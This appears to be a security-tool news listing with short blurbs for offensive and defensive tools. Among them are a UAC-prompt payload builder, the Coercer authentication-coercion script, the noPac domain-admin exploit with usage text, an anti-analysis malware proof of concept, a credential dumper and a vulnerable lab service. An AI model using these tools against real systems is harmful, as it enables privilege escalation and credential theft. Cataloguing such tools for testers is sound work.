ForceAdmin : Create Infinite UAC Prompts Forcing A User To Run As Admin
.png "ForceAdmin : Create Infinite UAC Prompts Forcing A User To Run As Admin")
ForceAdmin is a c# payload builder, creating infinate UAC pop-ups until the user allows the program to be ran. The inputted commands are ran via powershell calling cmd.exe and should be using the batch syntax. Why use? Well some users have UAC set to always show, so UAC bypass techniques are not possible. However - this attack will force...
Coercer : A Python Script To Automatically Coerce A Windows Server To Authenticate On An Arbitrary Machine
.png "Coercer : A Python Script To Automatically Coerce A Windows Server To Authenticate On An Arbitrary Machine")
Coercer is a python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods. Features Automatically detects open SMB pipes on the remote machine. Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine. Analyze mode with --analyze, which only lists the vulnerable protocols and functions listening, without performing...
noPac : Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User
.png "noPac : Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User")
noPac, Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user. Usage SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chainpositional arguments:usernameAccount used to authenticate to DC.optional arguments:-h, --help show this help message and exit--impersonate IMPERSONATEtarget username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is...
Aura : Python Source Code Auditing And Static Analysis On A Large Scale
Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI. Project goals: provide an automated monitoring system over uploaded packages to PyPI, alert on anomalies that can either indicate an ongoing attack or vulnerabilities in the codeenable an organization to conduct automated security audits of the source code...
BeatRev : POC For Frustrating/Defeating Malware Analysts
.png "BeatRev : POC For Frustrating/Defeating Malware Analysts")
BeatRev is a POC For Frustrating/Defeating Malware Analysts. The first time the malware runs on a victim it AES encrypts the actual payload(an RDLL) using environmental data from that victim. Each subsequent time the malware is ran it gathers that same environmental info, AES decrypts the payload stored as a byte array within the malware, and runs it. If...
ApacheTomcatScanner : A Python Script To Scan For Apache Tomcat Server Vulnerabilities
.png "ApacheTomcatScanner : A Python Script To Scan For Apache Tomcat Server Vulnerabilities")
ApacheTomcatScanner is a python script to scan for Apache Tomcat server vulnerabilities. Features Multithreaded workers to search for Apache tomcat servers. Multiple target source possible: Retrieving list of computers from a Windows domain through an LDAP query to use them as a list of targets. Reading targets line by line from a file. Reading individual targets (IP/DNS/CIDR) from -tt/--target option. Custom list of ports to test. Tests for /manager/html access and...
Aced : Tool to parse and resolve a single targeted Active Directory principal’s DACL
Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which...
Erlik : Vulnerable Soap Service
Erlik is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing. Features It contains the following vulnerabilities. -LFI -SQL Injection -Informaion Disclosure -Command Inejction -Brute Force -Deserialization Installation git clone https://github.com/anil-yelken/Vulnerable-Soap-Service cd Vulnerable-Soap-Service sudo pip3 install requirements.txt Usage sudo python3 vulnerable_soap.py Exploiting Vulnerabilities SQL Injection Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py Download
Masky : Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS
Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope. This tool does not exploit any new vulnerability and does not work by dumping the...
Awesome-Password-Cracking :A Curated List Of Awesome Tools, Research, Papers And Other Projects
.png "Awesome-Password-Cracking :A Curated List Of Awesome Tools, Research, Papers And Other Projects")
Awesome-Password-Cracking is a curated list of awesome tools, research, papers and other projects related to password cracking and password security. Read the guidelines before contributing! In short: List is alphabetically sortedIf in doubt, use awesome-lintIf you think an item shouldn't be here open an issue Books Hash Crack: Password Cracking Manual (v3) - Password Cracking Manual v3 is an expanded reference guide for password recovery (cracking) methods, tools,...
